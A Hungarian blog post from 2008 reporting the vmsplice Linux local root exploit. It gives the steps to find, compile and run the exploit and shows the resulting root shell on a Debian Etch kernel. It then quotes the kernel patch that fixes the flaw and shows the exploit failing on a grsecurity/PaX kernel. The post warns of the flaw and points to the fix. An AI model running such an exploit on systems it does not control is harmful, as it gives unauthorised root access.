Veszélyben a linux szerverek!!!

Author: xcke
Filed under: News, Open-source, Security, Uncategorized

Tuesday
Feb 12,2008

Na hát nem rég olvastam a HUP-n, hogy van egy új LINUX local root exploit. Nekiálltam, és kipróbáltam én is.

Nézzük, hogy a fél világ hogyan töri most szét a linux gépeket…

1. google: vmsplice local root

A legelső találat az exploit forráskódja.

2. vi vms.c

Fordítsuk le a fájlt.

3. gcc -o vms vms.c

Indítsuk el:

./vms

Éjjen éjjen hurrá, na az én teszt gépem egy viszonylag friss ETCH:

xcke@neuronhil:~$ ./vrm
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0xb7d9a000 .. 0xb7dcc000
[+] root
root@neuronhil:~# id
uid=0(root) gid=0(root) groups=1001(xcke)
root@neuronhil:~#

root@neuronhil:~# uname -a
Linux neuronhil 2.6.18-6-686 #1 SMP Wed Jan 23 03:23:22 UTC 2008 i686 GNU/Linux
root@neuronhil:~#

És kész is, root jog. Nem kell hozzá túl sok tudás. Na, hát kb ennyit a Linux biztonságáról is…Most cserélhetem le X db szerveren a kernelt

Javítás:

2.6.24.2 has been released to fix this
here’s the changelog

commit 1617e66d11d6621824f642728d62f242272fd063
Author: Bastian Blank <bastian@waldi.eu.org>
Date:   Sun Feb 10 16:47:57 2008 +0200

    splice: fix user pointer access in get_iovec_page_array()

    patch 712a30e63c8066ed84385b12edbfb804f49cbc44 in mainline.

    Commit 8811930dc74a503415b35c4a79d14fb0b408a361 ("splice: missing user
    pointer access verification") added the proper access_ok() calls to
    copy_from_user_mmap_sem() which ensures we can copy the struct iovecs
    from userspace to the kernel.

    But we also must check whether we can access the actual memory region
    pointed to by the struct iovec to fix the access checks properly.

UPDATE:

Szerencsére ha GRSEC/PAX-s kernelünk van akkor nem működik az exploit, vagy legalábbis az egyik saját szerveren…

xcke@xckePOWER:~$ ./vms
———————————–
Linux vmsplice Local Root Exploit
By qaaz
———————————–
[+] mmap: 0×0 .. 0×1000
[+] page: 0×0
[+] page: 0×20
[+] mmap: 0×4000 .. 0×5000
[+] page: 0×4000
[+] page: 0×4020
[+] mmap: 0×1000 .. 0×2000
[+] page: 0×1000
[+] mmap: 0×53707000 .. 0×53739000

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: PAX: suspicious general protection fault: 0000 [#1]

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: CPU:    0
Segmentation fault
xcke@xckePOWER:~$
Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: EIP:    0060:[<00061970>]    Not tainted VLI

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: EFLAGS: 00010202   (2.6.23.8-orly-grsec #1)

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: eax: 00001000   ebx: 00000004   ecx: 00000096   edx: 00000000

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: esi: e5abff7c   edi: ffffffe0   ebp: 00000001   esp: e5abfe14

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: ds: 0068   es: 0068   fs: 0000 gs: 0033 ss: 0068

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: Process vms (pid: 12610, ti=e5abe000 task=d5e2faa0 task.ti=e5abe000)

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: Stack: 00000003 00000000 00000030 00000000 fffcffff 00000030 00000030 00000000

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel:        000620a6 ffffffd0 00000000 00000000 e5abff24 00000000 e5abffe4 c5bafc60

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel:        ec507800 00000030 00000000 00000001 00000000 00001000 0001d000 00000000

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: Call Trace:

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: [<000620a6>] <0> [<0001d000>] <0> [<0004ea75>] <0> [<0005b1ac>] <0> [<000483a4>] <0> ===================                                                 ====

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: Code: 00 00 00 e8 f3 e4 fa ff 8d 43 28 b9 01 00 02 00 ba 1d 00 00 00 e8 51 1a ff ff 8d 1c ad 00 00 00 00                                                  eb 0f 8b 06 45 01 d8 83 c3 04 <8b> 00 e8 0a 51 fd ff 3b 6c 24 08 72 eb 83 c4 10 89 f8 5b 5e 5f

Message from syslogd@xckePOWER at Tue Feb 12 13:19:44 2008 …
xckePOWER kernel: EIP: [<00061970>] SS:ESP 0068:e5abfe14

xcke@xckePOWER:~$
xcke@xckePOWER:~$ uname -a
Linux xckePOWER 2.6.23.8-orly-grsec #1 Fri Nov 30 21:09:14 CET 2007 i686 GNU/Linux
xcke@xckePOWER:~$

Popularity: 32% [?]

Szerverek mentése Szerverek üzemeltetésénél fontos szempont, hogy folyamatosan mentenünk kell. Sajnos...
A Cisco és az open-source világ Az internet most attól hangos, hogy a Cisco linuxos megoldást...
dmidecode Biztos előfordult már mindenkivel, hogy hirtelen meg kellett nézni,...
Google Chrome Kipróbáltam a Google új böngészőjét. Már első látásra is nagyon...
Ipsec fontos portok Amennyiben egy PIX vagy egyéb security eszköz van a...

Cisco blogs

Support

Events

Feeds

Highest Rated

Now Reading

Planned books:

Inside Cisco IOS Software Architecture (CCIE Professional Development) (CCIE Professional Developmen by Vijay Bollapragada
CCNA Security Official Exam Certification Guide (Exam 640-553) (Exam Certification Guide) by Michael Watkins
Designing Cisco Network Service Architectures (ARCH) (Authorized Self-Study Guide) (2nd Edition) (Se by Keith Hutton
Deploying Cisco Wide Area Application Services (Networking Technology) by Zach Seils

Current books:

CCIE Routing and Switching Exam Quick Reference Sheets: Exam 350-001 v3.0 by Anthony Sequeira

Recent books:

None

View full Library

xcke’s blog

Veszélyben a linux szerverek!!!

Leave a reply

Menu

Recent Posts

Recent Comments

Blogroll

Cisco blogs

Tags

CCIE Pursuit

Tools

Categories

stat